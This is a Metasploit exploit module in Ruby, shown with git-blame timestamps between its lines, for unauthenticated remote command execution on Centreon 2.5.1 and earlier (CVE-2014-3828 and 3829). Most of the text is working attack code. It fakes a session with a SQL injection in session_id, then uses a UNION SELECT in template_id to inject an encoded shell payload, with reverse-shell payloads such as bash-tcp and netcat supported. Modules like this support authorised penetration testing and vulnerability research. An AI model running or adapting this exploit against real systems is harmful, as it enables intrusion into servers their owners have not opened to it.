2014-10-07 14:40:51 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2014-10-07 14:40:51 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf :: Exploit :: Remote
2014-10-07 14:40:51 -05:00
Rank = ExcellentRanking
include Msf :: Exploit :: Remote :: HttpClient
def initialize ( info = { } )
2025-06-20 13:20:44 +01:00
super (
update_info (
info ,
'Name' = > 'Centreon SQL and Command Injection' ,
'Description' = > %q{
This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
injection in the displayServiceStatus.php component, it is possible to execute arbitrary
commands as long as there is a valid session registered in the centreon.session table.
In order to have a valid session, all it takes is a successful login from anybody.
The exploit itself does not require any authentication.
This module has been tested successfully on Centreon Enterprise Server 2.2.
} ,
'License' = > MSF_LICENSE ,
'Author' = > [
2014-10-17 15:29:28 -05:00
'MaZ' , # Vulnerability Discovery and Analysis
2014-10-07 14:40:51 -05:00
'juan vazquez' # Metasploit Module
] ,
2025-06-20 13:20:44 +01:00
'References' = > [
2014-10-07 14:40:51 -05:00
[ 'CVE' , '2014-3828' ] ,
2014-10-17 15:29:28 -05:00
[ 'CVE' , '2014-3829' ] ,
[ 'US-CERT-VU' , '298796' ] ,
2018-09-15 18:54:45 -05:00
[ 'URL' , 'https://seclists.org/fulldisclosure/2014/Oct/78' ]
2014-10-07 14:40:51 -05:00
] ,
2025-06-20 13:20:44 +01:00
'Arch' = > ARCH_CMD ,
'Platform' = > 'unix' ,
'Payload' = > {
'Space' = > 1500 , # having into account 8192 as max URI length
2014-10-07 14:40:51 -05:00
'DisableNops' = > true ,
2025-06-20 13:20:44 +01:00
'Compat' = >
{
'PayloadType' = > 'cmd cmd_bash' ,
'RequiredCmd' = > 'generic python gawk bash-tcp netcat ruby openssl'
}
2014-10-07 14:40:51 -05:00
} ,
2025-06-20 13:20:44 +01:00
'Targets' = > [
2014-10-07 14:40:51 -05:00
[ 'Centreon Enterprise Server 2.2' , { } ]
] ,
2025-06-20 13:20:44 +01:00
'Privileged' = > false ,
'DisclosureDate' = > '2014-10-15' ,
2025-06-23 12:00:29 +01:00
'DefaultTarget' = > 0 ,
'Notes' = > {
2025-06-23 12:43:46 +01:00
'Reliability' = > UNKNOWN_RELIABILITY ,
'Stability' = > UNKNOWN_STABILITY ,
'SideEffects' = > UNKNOWN_SIDE_EFFECTS
2025-06-23 12:00:29 +01:00
}
2025-06-20 13:20:44 +01:00
)
)
2014-10-07 14:40:51 -05:00
register_options (
[
OptString . new ( 'TARGETURI' , [ true , 'The URI of the Centreon Application' , '/centreon' ] )
2025-06-20 13:20:44 +01:00
]
)
2014-10-07 14:40:51 -05:00
end
def check
random_id = rand_text_numeric ( 5 + rand ( 8 ) )
res = send_session_id ( random_id )
unless res && res . code == 200 && res . headers [ 'Content-Type' ] && res . headers [ 'Content-Type' ] == 'image/gif'
return Exploit :: CheckCode :: Safe
end
injection = " #{ random_id } ' or 'a'='a "
res = send_session_id ( injection )
if res && res . code == 200
if res . body && res . body . to_s =~ / sh: graph: command not found /
return Exploit :: CheckCode :: Vulnerable
elsif res . headers [ 'Content-Type' ] && res . headers [ 'Content-Type' ] == 'image/gif'
return Exploit :: CheckCode :: Detected
end
end
Exploit :: CheckCode :: Safe
end
def exploit
if check == Exploit :: CheckCode :: Safe
fail_with ( Failure :: NotVulnerable , " #{ peer } - The SQLi cannot be exploited " )
elsif check == Exploit :: CheckCode :: Detected
2014-10-23 13:15:55 -05:00
fail_with ( Failure :: Unknown , " #{ peer } - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later? " )
2014-10-07 14:40:51 -05:00
end
2016-02-01 15:12:03 -06:00
print_status ( " Exploiting... " )
2014-10-07 14:40:51 -05:00
random_id = rand_text_numeric ( 5 + rand ( 8 ) )
random_char = rand_text_alphanumeric ( 1 )
session_injection = " #{ random_id } ' or ' #{ random_char } '=' #{ random_char } "
template_injection = " ' UNION ALL SELECT 1,2,3,4,5,CHAR(59, #{ mysql_payload } 59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /** "
res = send_template_id ( session_injection , template_injection )
2014-10-17 15:29:28 -05:00
2014-10-07 14:40:51 -05:00
if res && res . body && res . body . to_s =~ / sh: --imgformat: command not found /
vprint_status ( " Output: #{ res . body } " )
end
end
def send_session_id ( session_id )
res = send_request_cgi (
2025-06-20 13:20:44 +01:00
'method' = > 'GET' ,
'uri' = > normalize_uri ( target_uri . to_s , 'include' , 'views' , 'graphs' , 'graphStatus' , 'displayServiceStatus.php' ) ,
2014-10-07 14:40:51 -05:00
'vars_get' = >
{
'session_id' = > session_id
}
)
res
end
def send_template_id ( session_id , template_id )
res = send_request_cgi ( {
2025-06-20 13:20:44 +01:00
'method' = > 'GET' ,
'uri' = > normalize_uri ( target_uri . to_s , 'include' , 'views' , 'graphs' , 'graphStatus' , 'displayServiceStatus.php' ) ,
2014-10-07 14:40:51 -05:00
'vars_get' = >
{
'session_id' = > session_id ,
'template_id' = > template_id
}
2025-06-20 13:20:44 +01:00
} , 3 )
2014-10-07 14:40:51 -05:00
res
end
def mysql_payload
p = ''
2025-06-20 13:20:44 +01:00
payload . encoded . each_byte { | c | p << " #{ c } , " }
2014-10-07 14:40:51 -05:00
p
end
end
